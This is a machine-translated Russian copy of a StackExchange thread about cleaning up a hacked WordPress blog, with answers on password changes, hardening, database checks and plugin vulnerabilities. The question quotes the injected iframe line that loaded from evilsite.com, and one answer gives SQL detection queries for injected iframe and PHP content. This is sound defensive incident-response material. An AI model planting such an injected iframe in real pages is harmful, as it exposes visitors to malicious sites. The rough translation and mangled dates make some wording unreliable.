Убедитесь, что я полностью удалил взломанный WordPress?

Мой блог для WordPress для http://fakeplasticrock.com (запуск WordPress 3.1.1) получил взломанный - - на каждой странице было показано <iframe>:

<iframe src = "http://evilsite.com/go/1"> </iframe>
<! DOCTYPE html PUBLIC "- //W3C //DTD XHTML 1.0 Strict //EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns = "http://www.w3.org/1999/xhtml" xml: lang = "en" lang = "en">

Я сделал следующее

  1. Обновление до 3.1.3 через встроенную систему обновления WordPress
  2. Установлен Exploit Scanner (много критических предупреждений о необычных файлах) и < a href = "http://wordpress.org/extend/plugins/antivirus/" rel = "noreferrer"> AntiVirus (это показало все зеленые и чистые, поэтому я удалил и удалил его после запуска)
  3. Изменен пароль MySQL.
  4. Изменены все пароли пользователей WordPress.
  5. Подключен по FTP и загружен всей файловой системы (не большой, это общий хост на базе только для WordPress)
  6. Разместил файловую систему с официальным ZIP-файлом WordPress 3.1.3 и удален или переписал все, что не соответствовало.

Я уверен, что

  • все файлы на диске являются официальными файлами WordPress 3.1.3.
  • на диске нет «лишних» файлов, кроме моего одного /theme, плагина Exploit Scanner (который я только что загрузил), папки /uploads и крошечная часть других ожидаемых файлов. Мой другой плагин wp-recaptcha соответствует текущей официальной загруженной версии.
  • Я также проверил файл .htaccess, и там ничего не получилось.

wordpress 3.1.3 сравнение файлов в Beyond Compare

Я не касался базы данных , но я боюсь думать, что что-то в базе данных может быть вредоносным без специального PHP-кода , чтобы заставить его работать?

В моем блоге WordPress появляется сообщение «ОК», и теперь я не могу взломать (я думаю), но есть ли что-нибудь еще, что я должен проверить?

97 голосов | спросил Jeff Atwood 10 J0000006Europe/Moscow 2011, 19:31:42

12 ответов


75

Вы идентифицировали вектор эксплойта? Если нет, вы можете оставить себя открытым для будущего использования.

Другие вещи, которые следует учитывать:

  1. Изменение пароля пользователя администратора WordPress - done
  2. Изменить пароль пользователя учетной записи хостинга
  3. Изменить FTP-пароли
  4. Изменить пароль пользователя MySQL db - done
  5. Изменить префикс таблицы db
  6. Обновите wp-config nonces /salt
  7. Проверьте права на каталог /файл
  8. Блокировать доступ к каталогам через .htaccess
  9. Пройдите все в Hardening WordPress . Ввод кода
  10. Пройдите все в FAQ Мой сайт был взломан Запись в кодексе
ответил Chip Bennett 10 J0000006Europe/Moscow 2011, 19:58:31
26

Глядя на сообщение «безопасный просмотр» в Google Chrome, вы получаете «.cc iFrame hack», который, похоже, собирается в последнее время. Я думаю, что 3.1.3 исправит это, но проверьте ваш файл index.php в корне, если ваш сайт, вот где он продолжал ударять меня, пока я не получил ВСЕ, а пароли изменились.

Есть некоторые ОЧЕНЬ хитрые вещи, которые люди могут делать с инъекциями сообщений и комментариев. Вы можете запустить следующие запросы к своей базе данных, чтобы помочь найти некоторые из них. Я записал остальную часть моего «отслеживания» здесь .

SELECT * FROM wp_posts WHERE post_content LIKE '% <iframe%'
UNION
SELECT * FROM wp_posts WHERE post_content LIKE '% <noscript%'
UNION
SELECT * FROM wp_posts WHERE post_content LIKE '% display:%'
UNION
SELECT * FROM wp_posts WHERE post_content LIKE '% <?%'
UNION
SELECT * FROM wp_posts WHERE post_content LIKE '% <? Php%'
SELECT * FROM wp_comments WHERE comment_content LIKE '% <iframe%'
UNION
SELECT * FROM wp_comments WHERE comment_content LIKE '% <noscript%'
UNION
SELECT * FROM wp_comments WHERE comment_content LIKE '% display:%'
UNION
SELECT * FROM wp_comments WHERE comment_content LIKE '% <?%'
UNION
SELECT * FROM wp_comments WHERE comment_content LIKE '% <? Php%'

Надеюсь, это поможет!

ответил Dillie-O 10 J0000006Europe/Moscow 2011, 20:00:39
20

База данных также может содержать вредоносный код: скрытые учетные записи пользователей или значения, которые где-то не распечатываются. Кроме того, проверьте каталог загрузки для файлов, которые не входят в него.

О, и попытайтесь понять, как злоумышленник нашел свой путь на ваш сайт. В общих учетных записях часто используется весь сервер. Проверьте другие сайты на сервере для взломанных блогов или других страниц. Прочитайте свой FTP-журнал. Если вы не знаете, как это произошло, вы не можете предотвратить следующий перерыв.

ответил fuxia 10 J0000006Europe/Moscow 2011, 19:47:11
13

Извините, что вы взломали - похоже, что вы сделали прекрасную работу по восстановлению, хотя!

Ваша файловая система звучит золотистой, я бы не сказал, что здесь есть что-то еще.

Я бы подумал, что Exploit Scanner выдаст предупреждение, если найдет в вашей базе скрипты, iframes, PHP (хотя и опасные, если eval'd), или другой необычный код в вашей базе данных.

Я не уверен, проверяет ли он таблицы, отличные от сообщений и amp; комментарии, возможно, стоит проверить /wp-admin/options.php для быстрого взгляда и посмотреть, заметили ли вы что-то странное.

Я бы также проверил вашу таблицу пользователей в клиенте MySQL (пользователи могут находиться в базе данных, но не видны в админе).

ответил TheDeadMedic 10 J0000006Europe/Moscow 2011, 19:49:16
8

Проверьте инструменты Google Webmaster для двух вещей:

  • убедитесь, что ваш сайт не был помечен как скомпрометированный, и запросите повторную проверку, если он имеет
  • проверьте свой сайт как робота Google и убедитесь, что спам не вставлен, который доступен только для Googlebot. Например, это взлом WP Pharma.

Кроме того, я бы повторил реализацию темы или тщательно ее проверил. Несколько строк PHP могут переопределять основные функции PHP, чтобы они извлекали вредоносный код из базы данных, особенно таблицы хранения /хранения wp_options

ответил Jon Galloway 10 J0000006Europe/Moscow 2011, 20:10:41
6

Поиск в базе данных через phpmyadmin для «iframe» или сброс базы данных и поиск текста.

И проверьте наличие невидимых пользователей в таблице users; Я видел пользователей в таблицах, которые не отображались в WP Admin> Users.

Чистые параметры. «Плагины WordPress покажут, что из старых и, возможно, уязвимых плагинов, базы данных.

В вашей теме также отсутствует тег <head>, поэтому я бы проверил это, если вы отредактировали тему, чтобы удалить плохие ссылки.

И обычный: Как найти бэкдор в взломанном WordPress и Создание WordPress «Кодекс WordPress

ответил markratledge 10 J0000006Europe/Moscow 2011, 19:58:58
5

"есть ли что-нибудь еще, что я должен проверить?" Вам нужно изучить ваш процесс и узнать, как вы были взломаны (почти наверняка, потому что вы не исправлялись вовремя или правильно), и исправить это тоже, а не только симптомы.

ответил Tom Chiverton 10 J0000006Europe/Moscow 2011, 20:00:32
4

Это случилось со мной однажды, через утечку на mediatemple. Мне пришлось написать плагин для проверки базы данных для впрыскиваемых ссылок. Вы можете захватить его здесь как github gist .

Он очень удобен для пользователя, имеет несколько шагов, обеспечивающих обратную связь и повторную проверку вашей базы данных после того, как вы закончите.

Удачи!

ответил kaiser 10 J0000006Europe/Moscow 2011, 20:01:11
4

У меня был очень похожий хак, который мне пришлось исправлять на одном из моих клиентских сайтов.

В файловой системе существовали вредоносные скрипты (php base64_decode stuff). Однако база данных 'posts' & «Комментарии» были скомпрометированы, и код iframe был также разбросан по этим данным.

Я бы по крайней мере провел несколько поисков в БД, чтобы быть в безопасности. :)

ответил Eric Allison 10 J0000006Europe/Moscow 2011, 20:11:06
3

Проверьте свои плагины!, до сих пор в этом году было выпущено 60 эксплойтов из плагинов .org, я бы заподозрил, что реальное число будет намного выше, поскольку никто не делает это на полную ставку.

Вы указали, что у вас есть только один плагин, ну, у него есть дыра в безопасности (не уверен, как долго он отсутствовал, и это может быть не вектор).

  

сор-Recaptcha-плагин
  Эксплоит был выпущен: 2011-03-18
  Версия Exploit: 2.9.8

Автор заявил, что он переписал версию 3.0, но упоминание об исправлении безопасности отсутствует.

http://www.wpsecure.net/2011/03/wp -recaptcha-плагин /

Журнал изменений: http://wordpress.org/extend/plugins/wp- Recaptcha /изменения /

ответил Wyck 11 J0000006Europe/Moscow 2011, 08:43:24
2

Я использую облачный сервер и имею случайные wacky номера порта ssh no ftp вообще. Пароли чрезвычайно сложно взломать. Все права доступа root полностью лишены. Я согласен с тем, что WordPress не будет вашим преступником. Еще одна вещь, которую нужно проверить - это сеансы ftp, которые не закрываются, вирус на вашем персональном компьютере (помните, что вы можете загружать файл на свой сайт и кто когда-либо загружает этот файл, может получить тот же вирус), также не сохраняйте свои пароли на общедоступных сайтах или в частных сайты всегда правят их на бумаге ни на одном документе или в блокноте.

Наконец, спросите своего хоста, были ли у них недавно нарушения, поскольку они должны иметь настройку брандмауэра

ответил xLRDxREVENGEx 11 J0000006Europe/Moscow 2011, 09:50:21
2

Проверьте дату ваших файлов. Ни один файл не должен иметь данные изменения, более новые, чем ваши последние изменения /установки!

Но и это может быть подделано. Самый верный способ быть уверенным в том, чтобы сравнить (например, хэш-сравнить) все файлы с исходными установочными файлами.

ответил powtac 11 J0000006Europe/Moscow 2011, 16:49:56

Похожие вопросы

Популярные теги

security × 330linux × 316macos × 2827 × 268performance × 244command-line × 241sql-server × 235joomla-3.x × 222java × 189c++ × 186windows × 180cisco × 168bash × 158c# × 142gmail × 139arduino-uno × 139javascript × 134ssh × 133seo × 132mysql × 132